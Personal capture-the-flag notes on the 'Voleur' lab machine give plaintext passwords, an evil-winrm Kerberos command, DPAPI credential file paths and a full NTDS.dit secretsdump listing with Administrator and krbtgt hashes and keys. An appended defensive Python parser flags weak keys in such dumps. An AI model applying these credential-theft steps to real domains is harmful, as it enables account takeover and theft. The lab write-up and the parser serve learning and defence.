start creds ryan.naylor / HollowOct31Nyt
used nxc smb to request TGT
use klist to list kerberos tickets and their info
the smb service is configured to only accept kerberos authentication
when user and pass work you are directly authenticating to the smb service with user and pass
use office2john.py to extract hash from document
doc pass Access_Review.xlsx:football1
svc_ldap P/W - M1XyC9pW7qT5Vn
svc_iis P/W - N5pXyW1VqM7CZ8
in remote management group but pass was deleted Todd.Wolfe NightT1meP1dg3on14
winrm-broken-hash ?:AFireInsidedeOzarctica980219afi
this worked for win-rm - this has to be the most ugly command I have ever written
KRB5CCNAME=./svc_winrm.ccache sudo docker run --rm -it -v "/home/ew/box/Voleur/svc_winrm.ccache:/tmp/krb5cc_0" -v "/home/ew/box/Voleur/krb5.conf:/etc/krb5.conf" -v "/etc/hosts:/etc/hosts:ro" evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB
folders to check for user data in /AppData directory
get /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88
get /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3
use this tool to crack dpapi key (data protection API)
impacket-dpapi - it's the key in the /protect folder
then use the tool to crack the user credentials in the /credentials folder
dumped NTDS.dit
secretsdump.py -ntds ntds.dit -system SYSTEM local
/usr/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7
DC:des-cbc-md5:64e05b6d1abff1c8
krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145
krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211
krbtgt:des-cbc-md5:34ae31d073f86d20
voleur.htb\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74
voleur.htb\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1
voleur.htb\ryan.naylor:des-cbc-md5:4376f7917a197a5b
voleur.htb\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d
voleur.htb\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f
voleur.htb\marie.bryant:des-cbc-md5:cdf1492604d3a220
voleur.htb\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9
voleur.htb\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066
voleur.htb\lacey.miller:des-cbc-md5:6eef922076ba7675
voleur.htb\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910
voleur.htb\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f
voleur.htb\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776
voleur.htb\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f
voleur.htb\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd
voleur.htb\svc_backup:des-cbc-md5:7ab513f8ab7f765e
voleur.htb\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258
voleur.htb\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395
voleur.htb\svc_iis:des-cbc-md5:70ce25431c577f92
voleur.htb\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0
voleur.htb\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27
voleur.htb\jeremy.combs:des-cbc-md5:192f702abff75257
voleur.htb\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114
voleur.htb\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831
voleur.htb\svc_winrm:des-cbc-md5:32b61fb92a7010ab
[*] Cleaning up...
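Added example, not part of these notes: a small Python parser for the secretsdump.py output format shown above (user:rid:lmhash:nthash::: lines and domain\user:etype:key lines) that turns a dump into a per-account inventory and flags the things a defender would want to clean up after such a dump: accounts that still carry DES Kerberos keys, accounts whose NT hash is the well-known empty-password hash, and accounts that still store a real LM hash. The sample dump, the lab.example domain and every hash in it are constructed for this example and are not values from the box.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Well-known constants: LM hash of an empty/absent password and NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# DES etypes are deprecated; an account that still has one can be forced down to 56-bit DES.
WEAK_ETYPE_PREFIXES = ("des-",)

# user:rid:lmhash:nthash:::  (the user part may carry a domain\ prefix)
NT_LINE = re.compile(r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")
# domain\user:etype:key  (secretsdump prints AES and DES keys; the RC4 key is the NT hash itself)
KRB_LINE = re.compile(r"^(?P<user>[^:\s]+):(?P<etype>[a-z0-9-]+):(?P<key>[0-9a-f]+)$")

# Constructed sample in secretsdump format; names and hashes are made up.
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy.user:1105:0f1e2d3c4b5a69788796a5b4c3d2e1f0:fedcba9876543210fedcba9876543210:::
lab.example\alice:aes256-cts-hmac-sha1-96:0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718293a4b5c6d7e8f9
lab.example\alice:aes128-cts-hmac-sha1-96:00112233445566778899aabbccddeeff
lab.example\alice:des-cbc-md5:0011223344556677
lab.example\bob:aes256-cts-hmac-sha1-96:f9e8d7c6b5a4938271605f4e3d2c1b0af9e8d7c6b5a4938271605f4e3d2c1b0a
[*] Cleaning up...
"""


@dataclass
class Account:
    name: str
    rid: int | None = None
    lm: str | None = None
    nt: str | None = None
    krb_keys: dict[str, str] = field(default_factory=dict)


def _short(name: str) -> str:
    """Strip an optional domain\\ prefix and normalise case so both line types merge."""
    return name.rsplit("\\", 1)[-1].lower()


def parse_secretsdump(text: str) -> dict[str, Account]:
    """Parse secretsdump output into {short_name: Account}; status lines are skipped."""
    accounts: dict[str, Account] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[*]"):
            continue
        m = NT_LINE.match(line)
        if m:
            acct = accounts.setdefault(_short(m["user"]), Account(_short(m["user"])))
            acct.rid, acct.lm, acct.nt = int(m["rid"]), m["lm"], m["nt"]
            continue
        m = KRB_LINE.match(line)
        if m:
            acct = accounts.setdefault(_short(m["user"]), Account(_short(m["user"])))
            acct.krb_keys[m["etype"]] = m["key"]
    return accounts


def weak_etype_accounts(accounts: dict[str, Account]) -> list[str]:
    """Accounts that still have a DES Kerberos key stored."""
    return sorted(a.name for a in accounts.values()
                  if any(e.startswith(WEAK_ETYPE_PREFIXES) for e in a.krb_keys))


def empty_password_accounts(accounts: dict[str, Account]) -> list[str]:
    """Accounts whose NT hash is the hash of the empty password."""
    return sorted(a.name for a in accounts.values() if a.nt == EMPTY_NT)


def lm_hash_present(accounts: dict[str, Account]) -> list[str]:
    """Accounts that still store a real (non-empty) LM hash, i.e. LM storage is not disabled."""
    return sorted(a.name for a in accounts.values() if a.lm and a.lm != EMPTY_LM)


if __name__ == "__main__":
    accts = parse_secretsdump(SAMPLE_DUMP)
    print("accounts:", len(accts))
    print("DES keys:", weak_etype_accounts(accts))
    print("empty password:", empty_password_accounts(accts))
    print("LM hash stored:", lm_hash_present(accts))
```

Run it on a real dump by replacing SAMPLE_DUMP with the file contents; anything in the DES list should have "Use Kerberos DES encryption types" cleared and a password rotation scheduled, since the key only changes when the password does.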